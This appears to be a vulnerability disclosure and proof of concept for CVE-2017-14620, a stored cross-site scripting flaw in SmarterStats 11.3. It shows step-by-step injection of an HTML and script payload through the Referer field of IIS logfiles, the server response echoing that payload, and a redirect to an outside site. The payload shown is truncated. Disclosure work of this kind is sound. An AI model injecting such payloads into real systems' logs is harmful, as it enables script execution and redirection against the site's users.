SmarterStats 11.3.6347 - Cross-Site Scripting

2017-10-27 21:05:03

Title: CVE-2017-14620
TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions,
will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries
Author: David Hoyt
Date: September 29, 2017
CVSS:3.0 Metrics
CVSS:3.0 Scores: Base Score 4.3, Temporal Score: 4.1, Environmental Score: 4.1
CVE-2017-14620, CWE-533, CWE-532, CWE-117, CWE-93, CAPEC-86, CAPEC-79, Stored Document Object Model Cross Site Scripting (Stored DOM XSS),
Client Side Request Forgery (CSRF), Open Redirection, HTTP Logfiles, Exploit, PoC, HTML Tags, SmarterStats 11.3
CVE-2017-14620 Requirements
SmarterStats Version 11.3
HTTP Proxy (BurpSuite, Fiddler)
Web Browser (Chrome - Current/Stable)
User Interaction Required - Must Click Referer Link Report
Supported Windows OS
Microsoft .NET 4.5
CVE-2017-14620 Reproduction
Vendor Link
Download Link

Step 1: Test with an HTTP Logfile containing a URL-encoded String to the Referer Field with HTML Tags to be Rendered in a Browser:<html><head><meta http-equiv=\"refresh\" content=\"5;
url=\"><title>Loading</title></head>\n<body><form method=\"post\"
action=\"\" target=\"_top\" id=\"rf\"><input type=\"hidden\"
name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn

Step 2: Verify the Injected IIS Logfile
Step 3: Process the Logfiles, Select the Referer URL Report.
In an HTTP Proxy, watch the URL http://localhost:9999/Data/Reports/ReferringURLsWithQueries
when Browsing http://localhost:9999/Default.aspx in Chrome (current/stable).

Step 4: Verify the Result in your HTTP Proxy returned from the Server:

{"c":[{"v":"<html><head><meta http-equiv=\"refresh\"
content=\"5; url=\"><title>Loading</title></head>\n<body>
<form method=\"post\" action=\"\" target=\"_top\" id=\"rf\">
<input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/>
</form>\n<script>!function(e,t){var n,i;return!e.navigator&form=nnn"},{"v":"2","f":"2"}]}

In your Browser, the HTTP Response will cause a GET to after 5 seconds. Verify in HTTP Proxy.
GET / HTTP/1.1

Step 5: Watch your Browser get Redirected to XSS.Cx.
Summary: The Referer Field in IIS Logfiles, and possibly other Field Names, are Rendered by SmarterStats Version 11.3.6347.
Reported to SmarterTools on September 19, 2017
Obtain CVE-2017-14620 from MITRE on September 20, 2017
Resolved September 28, 2017 with Version 11.xxxx


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